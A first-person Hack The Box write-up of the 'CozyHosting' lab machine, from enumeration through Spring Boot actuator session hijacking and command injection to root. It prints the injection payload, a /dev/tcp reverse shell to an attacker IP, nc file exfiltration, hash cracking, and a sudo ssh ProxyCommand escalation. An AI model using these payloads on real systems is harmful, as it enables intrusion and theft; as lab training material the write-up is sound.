![[CozyHosting.png]] Cozyhosting was a fun OSCP-like machine that educates the attacker on good enumeration and persistence. The machine starts with a webpage that has a Spring Boot actuator backend leading to an exposed session. The attacker is then able to login as the Admin user and exploit an RCE vulnerability within the webpage. The Attacker then leverages the low level user to analyze a file for credentials leading to a higher level users credentials. The high level user had a misconfigured sudo priveledge allowing root access. Starting with nmap, Ill go ahead add use my standard scan parameters, -sC to scan with default scripts, -sV for service and version detection, --min-rate to drastically increase its speed, and -oA to output my findings into a file format. ![[Proving Grounds/carryover/nmap.png]] ``` nmap 10.129.7.4 -sV -sC --min-rate 10000 -oA nmap-out ``` I will update my /etc/hosts file since the output mentions it did not follow a redirect to cozyhosting.htb. ![[Hack The Box/CozyHosting/hostsfile.PNG]] I will start with visiting the site since its the only open port I detected. ![[cozyhostingIndex.PNG]] Didn't find anything with passive recon, except for a login page in the top left. ![[loginpanel.PNG]] I tried basic creds like cozyhosting : password or admin : password but didnt get anywhere. I tried simple sql injections among other webpage login tactics and started banging my head against the desk because I couldn't really find anything. I started up Feroxbuster for any hidden webpages and nothing interesting appeared after letting it run for at least an hour. ![[Hack The Box/linkVortex/feroxbuster.png]] Then I decided that maybe there was content on another subdomain, so I used ffuf to check. But it returned nothing as well. ![[ffuf.PNG]] And nothing on gobuster, despite the image, I sat here for a while. ![[gobuster.PNG]] got stumped for a while and it started to hurt my confidence, until I tried dirsearch as a last resort. ![[dirsearch.PNG]] I almost couldn't believe that this was correct, especially since it happened within seconds. So I checked it. I used the default wordlist with dirsearch and clearly it contained something that the largest wordlist from SecLists didn't have. ![[actuator.PNG]] I was so happy to see progress. It looks like this machine is using Spring Boot actuators to monitor the app and gather metrics. "_/sessions_ lists HTTP sessions, given we are using Spring Session. _/beans_ returns all available beans in our _BeanFactory_. Unlike _/auditevents_, it doesn’t support filtering. _/health_ summarizes the health status of our application. _/env_ returns the current environment properties. Additionally, we can retrieve single properties." https://www.baeldung.com/spring-boot-actuators I went through each of these and was really interested in what I found in sessions. ![[sessions.PNG]] It's a cookie, I should be able to paste it in my browser and access the kanderson users session. ![[cookie.PNG]] now navigate to /admin. ![[loggedinAdmin.PNG]] And just like that I bypassed the login. There are only input block on this page, everything else doesn't work. Ill pass some values in to see what happens. ![[testtest.PNG]] nothing too exciting, let me pass cozyhosting.htb as the hostname and leave username blank. ![[hostnameashostname.PNG]] That is interesting, take a look at the browser url line. That looks a lot like what happens when you fat finger an ssh command on a linux terminal. The spill was put directly into the error line. Lets send this to the repeater in burpsuite to really see what's happening. ![[repeater.png]] Then Ill go the repeater and click send leaving the same inputted values as before. ![[spill.PNG]] Yes, I can confirm that the backend is simply running an ssh connect command. I started messing around with the inputs to see if I could get RCE, and I got it! ![[Hack The Box/Alert/RCE.png]] Looks like using the semicolon after the username and then wrapping a command in back ticks broke the filtering. ``` host=cozyhosting.htb&username=a;`id` ``` I went ahead and set up my listener on my machine. ``` nc -lvnp 443 ``` I tired passing a good old bash reverse shell one liner but had no success. The input cannot contain whitespace. ![[noWHite.PNG]] I tried url encoding with no success either. I had one more trick up my sleeve, I did happen to have a no white space sh one liner lying around. ``` host=10.129.7.4&username=a;`(sh)0>/dev/tcp/10.10.14.153/443` ``` Lets give that a run. ![[shell.PNG]] success! in order to get some functionality this is what you need to run step by step. ``` exec >&0 python3 -c 'import pty; pty.spawn("/bin/bash")' Ctrl ^Z stty raw -echo && fg reset screen export TERM=xterm ``` And with that, I have a fully functional shell as app. ![[shellasApp.PNG]] the user app doesn't have many permissions, it also doesn't have a home directory. But it has a directory in / that contains one large file and I imagine that is the way forward. So Ill transfer this file to my local machine using nc. First Ill set up a listener on my local machine. ``` nc -lvnp 4444 > file.jar ``` Then Ill run this command on the victim. ``` nc 10.10.14.153 4444 -w 3 < cloudhosting-0.0.1.jar ``` Ill wait for the file to transfer. Then check to see if I have it. ![[gotFile.PNG]] And I got it! I want to go ahead and unzip it, I can do this using the jar command. ``` jar xf file.jar ``` Now I have 3 new dirs, BOOT-INF, META-INF, and org. I spent a while digging through these files until I found something very interesting in BOOT-INF/classes/application.properties ``` cat application.properties ``` ![[credstosql.PNG]] This is great! this will allow me to connect to the postgresql database on the local host. I didnt know much about this process so I had to do some research. I kept getting this error. ![[sqlError.PNG]] After some research, It turns out you need to explicitly set 127.0.0.1 as the host. ![[psqlSuccess.PNG]] Thats more like it! I ran some basic queries to look for credentials. ``` \l #list databases \c cozyhosting #switch databases \t #show tables SELECT * FROM users ``` ![[sqlQuery.PNG]] ![[creds.PNG]] And there are some creds! I put the hashes into hashcat and managed to crack admin, couldn't crack kanderson though. ``` echo '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' > admin_hash hashcat admin_hash -m 3200 --wordlist /usr/share/wordlists/rockyou.txt ``` cracked! manchesterunited. The only thing I can imagine is that these creds must be for josh, the only other user on the machine ``` ssh [email protected] password: manchesterunited ``` ![[loginasjosh.PNG]] Success!! Grab the user flag! ![[userflg.PNG]] Check for sudo privledges ``` sudo -l ``` ![[sudo-l.PNG]] Ooof, I Immediatly run to [GTFObins](https://gtfobins.github.io/) and search for ssh, then scroll down to sudo and it looks like I can get root with just one command, easy day! ![[easyday.PNG]] ``` sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x ``` And with that, I have root and the flag! ![[rootflg.PNG]]